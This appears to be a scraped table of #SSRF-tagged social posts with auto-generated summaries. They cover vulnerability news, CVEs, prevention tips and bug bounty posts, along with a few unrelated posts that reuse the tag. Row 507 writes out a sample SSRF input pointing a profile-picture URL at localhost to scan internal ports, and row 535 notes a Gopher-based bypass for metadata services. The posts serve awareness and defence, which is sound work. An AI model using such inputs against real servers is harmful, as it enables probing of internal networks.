| 481 | 2025-03-13 15:33:24 UTC | Experts warn of a coordinated surge" in the exploitation attempts of #SSRF flaws #securityaffairs #hacking | Security experts are cautioning about a notable increase in coordinated exploitation attempts targeting Server-Side Request Forgery (SSRF) vulnerabilities. This surge in attacks poses a significant threat to cybersecurity. The warning highlights the importance of addressing and patching SSRF flaws promptly to prevent potential security breaches and hacking incidents. |
| 482 | 2025-03-13 14:31:40 UTC | Multiple SSRF vulnerabilities leveraged in far-reaching coordinated attack | The content discusses a significant cybersecurity threat involving multiple Server-Side Request Forgery (SSRF) vulnerabilities being exploited in a coordinated attack. This attack has far-reaching implications and highlights the importance of addressing and patching SSRF vulnerabilities to prevent unauthorized access to sensitive information or systems. It underscores the need for organizations to prioritize cybersecurity measures and stay vigilant against such threats to safeguard their digital assets and data. |
| 483 | 2025-03-13 13:33:44 UTC | Over 400 IPs Exploiting Multiple SSRF Vulnerabilities in a Coordinated Cyber Attack! Read the full report: #CyberSecurity #SSRF #Hacking #CloudSecurity #CyberThreats #DataBreach #InfoSec #CyberAttack #NetworkSecurity #EthicalHacking | Over 400 IPs are involved in a coordinated cyber attack exploiting multiple SSRF vulnerabilities. The full report provides details on this cybersecurity threat, covering topics like hacking, cloud security, data breaches, network security, and ethical hacking. The attack highlights the importance of addressing vulnerabilities and enhancing cybersecurity measures to protect against cyber threats. |
| 484 | 2025-03-13 10:46:51 UTC | OpenAI Under Attack: CVE-2024-27564 Actively Exploited in the Wild | OpenAI is facing an active cyber attack through CVE-2024-27564, which is being exploited in the wild. The vulnerability poses a significant threat to OpenAI's systems and data security. It is crucial for OpenAI to address this issue promptly to prevent further exploitation and potential damage. Vigilance and immediate action are necessary to mitigate the risks associated with this ongoing attack. |
| 485 | 2025-03-13 08:33:43 UTC | Coordinated surge in SSRF attacks detected with over 400 IPs exploiting multiple vulnerabilities simultaneously. Organizations urged to strengthen defenses. #CyberCode #SSRF #ThreatAlert | A coordinated surge in SSRF attacks involving over 400 IPs exploiting multiple vulnerabilities simultaneously has been detected. Organizations are advised to enhance their defenses against these threats. The alert emphasizes the importance of strengthening cybersecurity measures to mitigate risks associated with SSRF attacks. #CyberCode #SSRF #ThreatAlert. |
| 486 | 2025-03-13 06:33:35 UTC | Over 400 #IPs #Exploiting Multiple #SSRF #Vulnerabilities in Coordinated #Cyber_Attack | The content discusses a coordinated cyber attack involving over 400 IPs exploiting multiple Server-Side Request Forgery (SSRF) vulnerabilities. This attack highlights the importance of addressing and patching vulnerabilities to prevent such incidents. |
| 487 | 2025-03-13 02:28:26 UTC | Over 400 IPs are exploiting SSRF vulnerabilities in a coordinated cyber attack warns GreyNoise. Stay informed on these threats! #CyberSecurity #SSRF #ThreatIntel | GreyNoise has identified over 400 IPs exploiting SSRF vulnerabilities in a coordinated cyber attack. This highlights a significant threat to cybersecurity. It is crucial to stay informed about these threats to protect against potential attacks. The warning emphasizes the importance of monitoring and addressing SSRF vulnerabilities to enhance cybersecurity defenses. #CyberSecurity #SSRF #ThreatIntel. |
| 488 | 2025-03-12 21:11:07 UTC | SSRF Exploitation Surge Highlights Evolving Cyberthreats | The content discusses the increasing prevalence of Server-Side Request Forgery (SSRF) exploitation as a significant cyber threat. SSRF attacks allow hackers to manipulate a server into making unauthorized requests, potentially leading to data breaches or system compromise. This surge in SSRF exploitation underscores the evolving nature of cyber threats and the need for robust security measures to protect against such vulnerabilities. |
| 489 | 2025-03-12 14:28:18 UTC | infosecbulletin.com/400-ips-exploi #infosecbulletin #ssrf | The content shared is a link to a webpage discussing the exploitation of 400 IPs, related to security vulnerabilities known as Server-Side Request Forgery (SSRF). The link provided seems to offer more details or insights on this topic. The hashtags #infosecbulletin and #ssrf suggest that the content is related to information security bulletins and SSRF vulnerabilities. |
| 490 | 2025-03-12 13:29:03 UTC | Over 400 IPs Exploiting #Multiple #SSRF #Vulnerabilities in Coordinated Cyber Attack scyscan.com/news/over-400- | Over 400 IPs are exploiting multiple Server-Side Request Forgery (SSRF) vulnerabilities in a coordinated cyber attack. The attack is significant and concerning, as SSRF vulnerabilities can be used to manipulate server requests and potentially access sensitive information or systems. The source of this information is scyscan.com/news. |
| 491 | 2025-03-12 12:28:53 UTC | MAIS DE 400 IPS EXPLORANDO VÁRIAS VULNERABILIDADES SSRF EM ATAQUE CIBERNÉTICO COORDENADO #SamirNews #mais #de #400 #ips #explorando #várias #vulnerabilidades #ssrf #em #ataque #cibernético #coordenado | Over 400 IPs are exploiting multiple SSRF vulnerabilities in a coordinated cyber attack. The attack is significant and coordinated, targeting various vulnerabilities. The content is related to cybersecurity and highlights the exploitation of SSRF vulnerabilities by a large number of IPs. The post includes hashtags like #SamirNews and provides a link for more information. |
| 492 | 2025-03-12 12:22:11 UTC | Over 400 IPs Exploiting Multiple SSRF Vulnerabilities in Coordinated Cyber Attack | A coordinated cyber attack involving over 400 IPs exploiting multiple Server-Side Request Forgery (SSRF) vulnerabilities has been detected. SSRF vulnerabilities allow attackers to manipulate a server into making unauthorized requests, potentially leading to data breaches or server compromise. The attack highlights the importance of addressing and patching vulnerabilities promptly to prevent exploitation. Vigilance and proactive security measures are crucial in defending against such coordinated cyber threats. |
| 493 | 2025-03-12 11:11:46 UTC | Java Axios Package Vulnerability Threatens Millions of Servers with SSRF Exploit | A vulnerability in the Java Axios package poses a serious threat to millions of servers due to a Server-Side Request Forgery (SSRF) exploit. This vulnerability could allow attackers to manipulate a server into making unauthorized requests, potentially leading to data breaches or server compromise. Server administrators are advised to update their Java Axios package to the latest version to mitigate this security risk. |
| 494 | 2025-03-12 11:11:44 UTC | Over 400 IPs Actively Exploiting Multiple SSRF Vulnerabilities in the Wild | The content highlights that more than 400 IPs are currently exploiting various Server-Side Request Forgery (SSRF) vulnerabilities in the wild. This indicates a significant threat to online security as attackers are actively targeting these vulnerabilities. It emphasizes the importance of addressing and patching SSRF vulnerabilities to prevent potential cyber attacks and protect sensitive data. |
| 495 | 2025-03-12 10:01:51 UTC | 400 IPs Actively Exploiting Multiple SSRF Vulnerabilities In The Wild | Over 400 IPs are currently exploiting various Server-Side Request Forgery (SSRF) vulnerabilities in the wild. This poses a significant security risk as SSRF vulnerabilities can be used by attackers to manipulate server requests and potentially access sensitive information or execute unauthorized actions. It is crucial for organizations to promptly address and patch these vulnerabilities to prevent exploitation and safeguard their systems and data from potential breaches. |
| 496 | 2025-03-12 09:28:41 UTC | رشتو: آسیب پذیری #SSRF در #Axios آسیب پذیری شناسه CVE-2025-27152 و امتیاز 7.7 داره. مهاجم میتونه به منابع داخلی شبکه یا اطلاعات حساس مانند اعتبارنامه ها دسترسی داشته باشه. نسخه های تحت تاثیر: همه ی نسخه ها تا 1.7.9 نسخه ی اصلاح شده: نسخه ی 1.8.2 یا جدیدتر #جاوااسکریپت #CVE | The content discusses a vulnerability in Axios marked as CVE-2025-27152 with a severity score of 7.7, allowing attackers to access internal network resources and sensitive information like credentials. Affected versions are up to 1.7.9, with the fixed version being 1.8.2 or newer. This vulnerability is related to SSRF (Server-Side Request Forgery) in JavaScript. It highlights the importance of updating to the patched version to mitigate the risk of unauthorized access to sensitive data. |
| 497 | 2025-03-09 19:13:42 UTC | Common SSRF Attack Vectors Internal APIs & cloud metadata services Localhost services (127.0.0.1) Open Redirects & DNS rebinding Misconfigured webhooks & integrations Know your attack surface! #SSRF #CyberAwareness | The content discusses common Server-Side Request Forgery (SSRF) attack vectors, including targeting internal APIs, cloud metadata services, localhost services (127.0.0.1), open redirects, DNS rebinding, and misconfigured webhooks/integrations. It emphasizes the importance of understanding your attack surface to prevent SSRF attacks. The post raises awareness about cybersecurity and encourages vigilance against SSRF threats. |
| 498 | 2025-03-09 19:13:42 UTC | What is Server-Side Request Forgery (SSRF)? SSRF tricks a server into making unintended requests potentially bypassing security controls. Attackers can exploit this to: Access internal services Bypass firewalls Steal sensitive data Stay alert! #CyberSecurity #SSRF | Server-Side Request Forgery (SSRF) tricks servers into making unintended requests, bypassing security controls. Attackers exploit this to access internal services, bypass firewalls, and steal sensitive data. Stay alert for SSRF threats in cybersecurity. |
| 499 | 2025-03-08 05:04:17 UTC | はてなブログに投稿しました SSRF攻撃の影響とは - Shikata Ga Nai #セキュリティ #SSRF | The content posted on Hatena Blog discusses the impact of Server-Side Request Forgery (SSRF) attacks. The author, Shikata Ga Nai, explores the consequences of SSRF attacks in the realm of security. The post delves into the significance of understanding and mitigating SSRF vulnerabilities. The hashtags used are #セキュリティ (security) and #SSRF, indicating the focus on security-related topics and SSRF attacks. |
| 500 | 2025-03-07 17:04:08 UTC | RibFest 2025: Master surgical stabilization of rib & sternal fractures. Join us on Aug 16 @StanfordMed for expert-led lectures & hands-on cadaver training. Limited spots availableregister now. stanford.cloud-cme.com/course/courseo #SSRF #TraumaSurgery #CME @StanfordSurgery | RibFest 2025 at StanfordMed offers training in surgical stabilization of rib and sternal fractures on Aug 16. The event includes expert-led lectures and hands-on cadaver training. Limited spots are available, so registration is encouraged. The focus is on mastering trauma surgery techniques. Participants can register at stanford.cloud-cme.com/course/courseo. #SSRF #TraumaSurgery #CME @StanfordSurgery. |
| 501 | 2025-03-06 05:58:39 UTC | My First Successful Bug Bounty Report! Super excited to share that Ive successfully reported my first security vulnerability through a bug bounty program! Found a Unauthenticated Blind SSRF vulnerability and the report was accepted #BugBounty #ssrf | The content celebrates the author's first successful bug bounty report, where they discovered an Unauthenticated Blind SSRF vulnerability and had their report accepted. The author is excited to share this achievement through a bug bounty program. The post includes hashtags #BugBounty and #ssrf. |
| 502 | 2025-03-03 10:43:16 UTC | My First Successful Bug Bounty Report! Super excited to share that Ive successfully reported my first security vulnerability through a bug bounty program! Found a Unauthenticated Blind SSRF vulnerability and the report was accepted #BugBounty #ssrf | The content shares the author's excitement about successfully reporting their first security vulnerability through a bug bounty program. They discovered an Unauthenticated Blind SSRF vulnerability, and their report was accepted. The author highlights their achievement and uses hashtags like #BugBounty and #ssrf to share their experience. |
| 503 | 2025-02-25 12:21:44 UTC | Sliver C2 Server Vulnerability Let Attackers Open a TCP connection to Read Traffic | The Sliver C2 Server vulnerability allows attackers to open a TCP connection to read traffic. This vulnerability poses a security risk as it enables unauthorized access to sensitive information. It is crucial for users of the Sliver C2 Server to be aware of this issue and take necessary precautions to prevent potential exploitation by malicious actors. |
| 504 | 2025-02-24 21:13:57 UTC | SSRF Prevention Tip #4 Validate & sanitize user input! Reject non-HTTP/HTTPS URLs Restrict port ranges Use safe URL parsers to prevent bypasses Security starts with input validation! #CyberSec #SSRF | The content emphasizes the importance of preventing Server-Side Request Forgery (SSRF) by validating and sanitizing user input. It suggests rejecting non-HTTP/HTTPS URLs, restricting port ranges, and using safe URL parsers to avoid bypasses. Highlighting that security begins with input validation, the post stresses the significance of these measures in cybersecurity. #CyberSec #SSRF. |
| 505 | 2025-02-24 21:13:56 UTC | SSRF Prevention Tip #3 Never return raw responses! SSRF exploits often rely on getting API responses. Mask or sanitize responses to prevent attackers from extracting sensitive info! #SSRF #APIsecurity | Tip #3 for preventing Server-Side Request Forgery (SSRF) attacks advises against returning raw API responses to thwart attackers from extracting sensitive information. Masking or sanitizing responses is recommended to enhance security and protect against SSRF exploits. This precaution helps safeguard against potential vulnerabilities and ensures API security. |
| 506 | 2025-02-24 21:13:56 UTC | SSRF Prevention Tip #1 Use an allowlist for external domains! Only permit URLs from trusted sources (e.g. Google Drive Gravatar). Block unknown origins to prevent malicious requests. #AppSec #SSRF | The content provides a tip for preventing Server-Side Request Forgery (SSRF) attacks by using an allowlist for external domains. It suggests allowing only URLs from trusted sources like Google Drive and Gravatar while blocking unknown origins to avoid malicious requests. This practice enhances application security and helps mitigate the risk of SSRF vulnerabilities. The use of an allowlist is recommended to restrict access to specific domains, reducing the attack surface and protecting against unauthorized requests. #AppSec #SSRF. |
| 507 | 2025-02-24 21:13:55 UTC | Real-World SSRF Attack A social network lets users upload profile pictures via a URL. An attacker submits: 📌 "picture_url": "http://localhost:8080" 📌 API unintentionally scans internal ports! 🚨#SSRF #CyberThreats— Otesile Olaoluwa (@OtesileOlaoluwa) February 24, 2025 | The content discusses a real-world Server-Side Request Forgery (SSRF) attack on a social network that allows users to upload profile pictures via a URL. The attacker submitted a malicious URL pointing to "http://localhost:8080," triggering the API to unintentionally scan internal ports. This incident highlights the vulnerability of SSRF attacks and the potential cybersecurity threats they pose. The tweet warns about the attack and raises awareness about the importance of safeguarding against such cyber threats. |
| 508 | 2025-02-24 21:13:54 UTC | What is SSRF? Server-Side Request Forgery (SSRF) lets attackers force an API to fetch remote resources without validation. This can bypass firewalls expose sensitive data and even lead to DoS attacks. #CyberSecurity #SSRF | SSRF, or Server-Side Request Forgery, allows attackers to manipulate APIs to access remote resources without validation. This vulnerability can circumvent firewalls, compromise sensitive data, and potentially trigger denial-of-service (DoS) attacks. It poses significant cybersecurity risks and requires attention to prevent exploitation. |
| 509 | 2025-02-22 16:04:24 UTC | SSRF challenge cracked on TryHackMe! Learned how insecure server-side requests can expose internal systems. Hack learn secure repeat! #CyberSecurity #SSRF #TryHackMe #BugBounty tryhackme.com/r/room/ssrfqi? | The content discusses successfully completing an SSRF challenge on TryHackMe, highlighting the risks of insecure server-side requests exposing internal systems. The message emphasizes the importance of learning, securing, and repeating the process. It also mentions cybersecurity, SSRF, TryHackMe, and Bug Bounty. The link provided directs to the TryHackMe room for the SSRF challenge. |
| 510 | 2025-02-20 12:58:32 UTC | SSRF flaw in Sliver C2 teamserver lets attackers spoof callbacks (CVE-2025-27090). Patch now to avoid compromise! #SSRF #Cybersecurity #Vulnerability | A Server-Side Request Forgery (SSRF) flaw in Sliver C2 teamserver allows attackers to spoof callbacks (CVE-2025-27090). It is crucial to patch this vulnerability immediately to prevent potential compromise. Stay vigilant about cybersecurity threats and take necessary actions to secure your systems. #SSRF #Cybersecurity #Vulnerability. |
| 511 | 2025-02-18 17:48:53 UTC | Explore "Hacking Layer 7" for insights on web vulnerabilities and defenses. ethicbreach.com/2025/02/18/app #ethicbreach #L7Hack #CyberSec #EthHack #WebSec #AppSec #OWASP #Inject #Srvr #Clnt #SMTP #DNS #FTP #SSRF #Hdrs #Vldtn #SecCode Follow for insights like if helpful! | The content discusses exploring "Hacking Layer 7" for insights on web vulnerabilities and defenses, with hashtags related to cybersecurity topics. It encourages following for helpful insights. The link provided directs to a webpage for further information. Key points include focusing on Layer 7 vulnerabilities, using relevant hashtags, and promoting engagement for cybersecurity insights. |
| 512 | 2025-02-17 19:43:33 UTC | #ssrf Your First Critical Bug Bounty! SSRF Hunting Made Easy youtu.be/bSn7tWFP354?fe via @YouTube | The content discusses finding Server-Side Request Forgery (SSRF) vulnerabilities for bug bounties, providing tips and guidance for beginners. It highlights a video tutorial on SSRF hunting, aiming to make the process easier. The link leads to a YouTube video offering insights on identifying and exploiting SSRF vulnerabilities. The content emphasizes the importance of SSRF as a critical bug bounty target and suggests resources for learning more about this type of vulnerability. |
| 513 | 2025-02-17 10:48:18 UTC | Common application #vulnerabilities attacks: - path/directory traversal - session hijacking - #CSRF - #DDOS - #IDOR - #CRLF - race condition (TOCTTOU) - insecure deserialization (object injection) - forced browsing (url not restricted) - #XXE - #SSRF | The content discusses common application vulnerabilities attacks such as path/directory traversal, session hijacking, CSRF, DDoS, IDOR, CRLF, race condition, insecure deserialization, forced browsing, XXE, and SSRF. These vulnerabilities can be exploited by attackers to compromise the security of applications. It is crucial for developers and organizations to be aware of these vulnerabilities and implement proper security measures to protect their applications from potential attacks. |
| 514 | 2025-02-17 09:43:50 UTC | New Writeup Alert! "SSRF Advanced Methodology" by Abhijeet kumawat is now live on IW! Check it out here: infosecwriteups.com/ecbe289886ef #money #infosec #ssrf #hacking #bugbounty | Abhijeet Kumawat's new writeup on "SSRF Advanced Methodology" is now available on IW. The content covers SSRF techniques and bug bounty hunting related to hacking and information security. Readers can access the writeup at infosecwriteups.com/ecbe289886ef. The post is aimed at those interested in money, infosec, SSRF, hacking, and bug bounty programs. |
| 515 | 2025-02-16 06:38:25 UTC | 4/7 From code injection to #SQL attacks @Microsoft wants your help finding vulnerabilities in Copilot AI. Report issues like #SSRF or authentication flaws and earn rewards! #Cybersecurity #AI #BugHunting | Microsoft is seeking help to identify vulnerabilities in Copilot AI, offering rewards for reporting issues like code injection, SQL attacks, SSRF, and authentication flaws. This initiative aims to enhance cybersecurity by addressing potential weaknesses in the AI system. Bug hunters can contribute to improving the security of Copilot AI and earn rewards for their efforts. |
| 516 | 2025-02-15 14:38:46 UTC | @kcsfa There is a misconfiguration that could lead to password #bruteforce Server side requests forgery #ssrf that could leak internal IP's and lead to #RCE #API { "id": 1 "name": "c" "url": "" "description": "" "link ........ } | The content warns about a misconfiguration that could result in password brute-forcing, server-side request forgery (SSRF) leading to leaking internal IPs, and remote code execution (RCE) via API. It includes a snippet of code with an ID, name, URL, and description. The post emphasizes the potential security risks associated with the mentioned misconfiguration. |
| 517 | 2025-02-12 05:23:04 UTC | So proud of the amazing surgeon-scientists who made this @JTraumAcuteSurg publication happen. My @CWISociety colleagues are amazing! #ssrf #chestwallinjury #cwismemberresearch | The content expresses pride in surgeon-scientists for their publication in the Journal of Trauma and Acute Care Surgery. The author commends their colleagues from the Chest Wall Injury Society for their work. The hashtags #ssrf, #chestwallinjury, and #cwismemberresearch are used to highlight the research and collaboration. |
| 518 | 2025-02-11 08:18:35 UTC | آسیب پذیری CVE-2025-25065 از نوع #SSRF و دارای امتیاز 5.3 هستش. آسیب پذیری در تجزیه کننده RSS feed هستش که امکان ریدایرکت غیرمجاز به نقاط پایانی داخل شبکه رو میده. نسخه ی اصلاح شده: 9.0.0 Patch 43 10.0.12 10.1.4 | The vulnerability CVE-2025-25065 is an SSRF type with a severity score of 5.3. It affects an RSS feed parser allowing unauthorized redirects to network endpoints. The patched versions are 9.0.0 Patch 43, 10.0.12, and 10.1.4. |
| 519 | 2025-02-10 17:19:14 UTC | #Zimbra Releases# Security Updates for #SQL_Injection #Stored_XSS and #SSRF #Vulnerabilities | Zimbra has released security updates addressing SQL injection, stored XSS, and SSRF vulnerabilities. These updates aim to enhance the security of the Zimbra platform by fixing these critical issues. Users are advised to promptly apply the updates to protect their systems from potential exploitation. |
| 520 | 2025-02-10 16:19:01 UTC | Warning: Critical and Medium Improper Neutralization in SQL command and Server-Side Request Forgery #SSRFin #Zimbra #SyncService #Zimbracollaboration#CVE-2025-25064 #CVE-2025-25065 CVSS: 9.8-5.3. An attacker can execute an SQL injection to exploit these vulnerabilities.#Patch | The content warns of critical and medium vulnerabilities related to improper neutralization in SQL commands and Server-Side Request Forgery (#SSRF) in Zimbra's SyncService and Zimbra collaboration. The vulnerabilities are identified as CVE-2025-25064 and CVE-2025-25065 with CVSS scores of 9.8 and 5.3. An attacker could exploit these vulnerabilities through SQL injection. A patch is recommended to address these security issues. |
| 521 | 2025-02-10 14:52:09 UTC | Microsoft SharePoint Connector Vulnerability Let Attackers Steal Users Credentials | A vulnerability in Microsoft SharePoint Connector allows attackers to steal users' credentials. This security flaw poses a risk of unauthorized access to sensitive information. It is crucial for users to be aware of this issue and take necessary precautions to protect their credentials and data. Microsoft may release patches or updates to address this vulnerability, and users should stay informed and implement any recommended security measures promptly. |
| 522 | 2025-02-10 12:18:40 UTC | ZIMBRA LIBERA ATUALIZAÇÕES DE SEGURANÇA PARA INJEÇÃO DE SQL XSS E VULNERABILIDADES SSRF #SamirNews #zimbra #libera #atualizações #de #segurança #para #injeção #de #sql #xss #e #vulnerabilidades #ssrf | Zimbra has released security updates addressing SQL injection, XSS, and SSRF vulnerabilities. The updates aim to enhance security measures against these potential threats. The announcement was made through the #SamirNews platform and includes hashtags related to Zimbra, security updates, SQL injection, XSS, and SSRF vulnerabilities. |
| 523 | 2025-02-10 10:01:38 UTC | Zimbra Releases Security Updates for SQL Injection Stored XSS and SSRF Vulnerabilities | Zimbra has issued security updates to address SQL Injection, Stored XSS, and SSRF vulnerabilities. These updates aim to enhance the security of the Zimbra platform and protect users from potential exploitation of these vulnerabilities. Users are advised to promptly apply the updates to safeguard their systems and data from security risks. |
| 524 | 2025-02-07 10:08:25 UTC | Preventing SSRF at the Application Layer Validate & sanitize user input Use an allow-list for URLs ports & destinations Disable HTTP redirections Be cautious of DNS rebinding & TOCTOU race conditions Secure coding saves lives! #DevSecOps #SSRF | To prevent Server-Side Request Forgery (SSRF) at the application layer, validate and sanitize user input, use an allow-list for URLs, ports, and destinations, disable HTTP redirections, and be cautious of DNS rebinding and TOCTOU race conditions. Secure coding practices are crucial for preventing SSRF incidents. The content emphasizes the importance of DevSecOps and implementing these measures to enhance security and protect against SSRF vulnerabilities. |
| 525 | 2025-02-07 10:08:24 UTC | How does SSRF work? A web app fetches a remote resource without validating the user-supplied URL. Attackers exploit this to send malicious requests accessing internal services metadata & even causing RCE! #AppSec #SSRF | SSRF (Server-Side Request Forgery) occurs when a web app fetches a remote resource without validating the user-supplied URL. Attackers exploit this vulnerability to send malicious requests, accessing internal services, metadata, and potentially causing Remote Code Execution (RCE). Proper validation of user input is crucial to prevent SSRF attacks. #AppSec #SSRF |
| 526 | 2025-02-06 22:16:37 UTC | Microsoft SharePoint Connector Flaw Could've Enabled Credential Theft Across Power Platform | A vulnerability in the Microsoft SharePoint Connector could have allowed attackers to steal credentials across the Power Platform. This flaw posed a security risk by potentially enabling unauthorized access to sensitive information. Microsoft has likely addressed this issue to prevent credential theft and enhance the security of the Power Platform. |
| 527 | 2025-02-06 18:03:47 UTC | SSRF attacks can cripple your Go apps. Learn how to prevent them with this step-by-step guide & code examples. #golang #security #SSRF snyk.co/uh2GO | The content discusses how Server-Side Request Forgery (SSRF) attacks can harm Go applications and provides a step-by-step guide with code examples to prevent them. It emphasizes the importance of securing Go apps against SSRF attacks for enhanced security. The guide aims to help developers understand and implement measures to safeguard their applications from potential vulnerabilities. The content is relevant for those working with Go programming language and interested in enhancing the security of their applications. |
| 528 | 2025-02-05 23:03:49 UTC | 2/8 How does the SharePoint vulnerability work? Attackers could exploit Server-Side Request Forgery (SSRF) to inject malicious URLs steal JWT tokens and make unauthorized #API requests. A serious risk for organizations using Power Platform! #CyberThreat #SSRF #API | The SharePoint vulnerability allows attackers to use Server-Side Request Forgery (SSRF) to inject malicious URLs, steal JWT tokens, and make unauthorized API requests. This poses a significant risk to organizations using the Power Platform. The exploit highlights the importance of addressing cybersecurity threats like SSRF. |
| 529 | 2025-02-05 08:58:48 UTC | Learn how to master SSRF Vulnerabilities with our step-by-step guide using PortSwigger Labs! Dive deep into the process and sharpen your skills. #SSRF #CyberSecurity #WebAppSecurity #cybersecurityskills #EthicalHacking #TrendingNow | Master SSRF vulnerabilities with a step-by-step guide using PortSwigger Labs to enhance cybersecurity skills. Dive deep into the process for ethical hacking and web app security. Trending topic in cybersecurity. #SSRF #CyberSecurity #WebAppSecurity #cybersecurityskills #EthicalHacking |
| 530 | 2025-02-05 05:58:39 UTC | SSRF: Anatomy of a Cloud Attack @ Cloud Village | @seasides_conf 2025! Join @Zero0x00 as he explores SSRF attacks with Burp Suite & AWS Metadata. A must-attend for cloud security pros! 22 Feb 2025 #CloudSecurity #SSRF #Seasides2025 | The content discusses an upcoming session at the Cloud Village event at the Seasides Conference 2025, focusing on SSRF attacks using Burp Suite and AWS Metadata. Led by @Zero0x00, the session is aimed at cloud security professionals and is scheduled for February 22, 2025. It emphasizes the importance of understanding SSRF attacks in cloud security. Attendees are encouraged to join to gain insights into this critical aspect of cloud security. |
| 531 | 2025-02-04 03:53:45 UTC | [A Practical Guide] Exploiting SSRF with Filter Bypass via Open Redirection Source: link.medium.com/HVR71xVBHQb #ssrf #openredirect #ssrfexploitation #openredirectexploitation #ssrffilterbypass #bugbounty #bugbountytips | The content provides a practical guide on exploiting Server-Side Request Forgery (SSRF) with filter bypass using open redirection. It discusses techniques to bypass filters and exploit vulnerabilities related to SSRF and open redirection. The focus is on bug bounty tips and strategies for exploiting SSRF vulnerabilities effectively. The content aims to provide insights and practical guidance for security researchers and bug bounty hunters interested in SSRF exploitation. |
| 532 | 2025-02-03 18:53:46 UTC | Nowy odcinek na YouTube! Jak działa SSRF (Server-Side Request Forgery) i jak atakujący mogą manipulować żądaniami HTTP? Sprawdź jak wykrywać i testować tę podatność! Obejrzyj teraz: #SSRF #Cybersecurity #BurpSuite #Pentesting #WebSecurity | The content discusses a new YouTube episode about SSRF (Server-Side Request Forgery), explaining how attackers manipulate HTTP requests and how to detect and test this vulnerability. It invites viewers to watch the episode to learn more about SSRF, cybersecurity, BurpSuite, pentesting, and web security. The link provided directs viewers to the YouTube video. |
| 533 | 2025-02-02 12:48:51 UTC | CVE-2024-54819 - I Librarian Server Side Request Forgery #CVE202454819 #ILibrarian #SSRF #Cybersecurity #Vulnerability | The content discusses a specific cybersecurity vulnerability identified as CVE-2024-54819 in I Librarian, related to Server Side Request Forgery (SSRF). The vulnerability is highlighted with relevant hashtags for tracking and awareness. For more details, the link provided can be accessed for additional information. |
| 534 | 2025-02-01 15:43:48 UTC | Looking for a Burp Collaborator alternative for SSRF testing? Bug bounty hunters & pentesters Interactsh is a must-have for SSRF exploitation web security and bug bounties. #BugBounty #PenetrationTesting #SSRF #HackingTools #ProjectDiscovery | Interactsh is recommended as a Burp Collaborator alternative for SSRF testing by bug bounty hunters and pentesters. It is considered essential for SSRF exploitation, web security, and bug bounties. The tool is highlighted for its effectiveness in these areas and is associated with Bug Bounty, Penetration Testing, SSRF, Hacking Tools, and Project Discovery. |
| 535 | 2025-02-01 07:38:24 UTC | Google Cloud 元数据服务为了缓解 SSRF 利用也需要加一个 HTTP 头部因为一般 SSRF 特别是 Web 利用 HTTP 头部是不可控的最近看到一个利用姿势如果支持 Gopher 协议因为 Gohper 支持构造 TCP 数据包所以构造 HTTP 头部字段也不在话下 #SSRF #CloudSec | Google Cloud's metadata service is enhancing security against SSRF attacks by requiring an additional HTTP header. SSRF exploits, especially in web contexts, often involve uncontrollable HTTP headers. A recent discovery suggests that supporting the Gopher protocol could be exploited, as Gopher allows crafting TCP packets, making manipulation of HTTP header fields feasible. This measure aims to mitigate SSRF vulnerabilities in cloud environments. #SSRF #CloudSec |
| 536 | 2025-01-30 03:28:28 UTC | #ಪಜಗಗ #ಹಗಳ ಆಯಕ #ಹಗ #ಮಡಬಕ ? #flower #puja #pooja #peace #ssrf.org # ನಮಮ ಇಷಟದವರ ನಮಜಪ ಮಡತತ ಹವ ಕಳಬಕ. ವವರವಗ ಓದರ Subscribe to Our Telegram Channel | The content discusses the selection and offering of flowers for worship (#ಪೂಜೆಗಾಗಿ #ಹೂಗಳ ಆಯ್ಕೆ #ಹೇಗೆ #ಮಾಡಬೇಕು). It emphasizes the importance of offering flowers while chanting the name of one's favorite deity for peace. The content also encourages readers to subscribe to their Telegram channel for more details. The key points include flower selection for worship, chanting names of deities while offering flowers, and a call to subscribe for further information. |
| 537 | 2025-01-29 10:23:23 UTC | Hey @deepseek_ai are you guys paying for Read SSRF vulnerability? I also got 56 XSS manually and was able to automate it to A&T. Let me know. #XSS #DeepSeekV3 #DeepSeek #ssrf #bugbountytips #BugBounty | The content is a message directed at @deepseek_ai asking if they pay for SSRF vulnerabilities. The sender mentions discovering 56 XSS vulnerabilities manually and automating them to A&T. They invite @deepseek_ai to contact them. The message includes hashtags related to XSS, DeepSeek, SSRF, bug bounty tips, and Bug Bounty. |
| 538 | 2025-01-28 21:23:59 UTC | Kritieke ssrf kwetsbaarheid in microsoft purview ontdekt: wat u moet weten #CVE-2025-21385 #Microsoft Purview kwetsbaarheid #SSRF-aanval #beveiligingsupdate #cybersecurity #Trending #Tech #Nieuws | A critical SSRF vulnerability in Microsoft Purview has been discovered, tagged as #CVE-2025-21385. This vulnerability poses a risk of SSRF attacks, emphasizing the importance of applying security updates promptly. The news highlights the significance of cybersecurity in tech trends. Stay informed and vigilant to protect systems from potential exploits. |
| 539 | 2025-01-28 20:23:15 UTC | Smol TryHackMe Writeup #smol #writeup #tryhackme #SSRF #WordPress #JSmol2WP #RCE #john #SUDO | The content is a brief writeup about a TryHackMe challenge named "Smol." It likely covers topics such as Server-Side Request Forgery (SSRF), WordPress vulnerabilities, JSmol2WP, Remote Code Execution (RCE), John the Ripper (password cracking tool), and SUDO privilege escalation. The writeup may provide insights into how these concepts were utilized to solve the challenge. The link provided seems to direct to the full writeup for those interested in detailed information. |
| 540 | 2025-01-28 19:23:36 UTC | یه گزارش #ssrf برای پروگرم بانتی دار فرستادم بعد 10 روز تیم پروگرم جواب داده که کلاینت سایده و یه چیز تو مایه های clipboard manager روی سیستمت داره ریکویست میزنه خوب پدسگ تست نکردی چرا زر میزنیاصن زرم نه چی میزنی #باگ_بانتی | The content discusses sending an SSRF report to a program's team, receiving a response after 10 days mentioning a client-side issue with a clipboard manager making requests. The author questions why proper testing was not conducted before reporting the issue. The post includes hashtags related to bug reporting. |
| 541 | 2025-01-28 16:23:41 UTC | Warning: Recent security update in #Kibana fixes #CVE-2024-43707 & #CVE-2024-43710. #Update to version 8.15.0 #SSRF #exposure of #sensitive #information #Patch #Patch #Patch | A recent security update in Kibana addresses CVE-2024-43707 and CVE-2024-43710, fixing vulnerabilities related to SSRF and exposure of sensitive information. Users are advised to update to version 8.15.0 to patch these issues. It is crucial to apply the patch promptly to protect against potential security threats. |
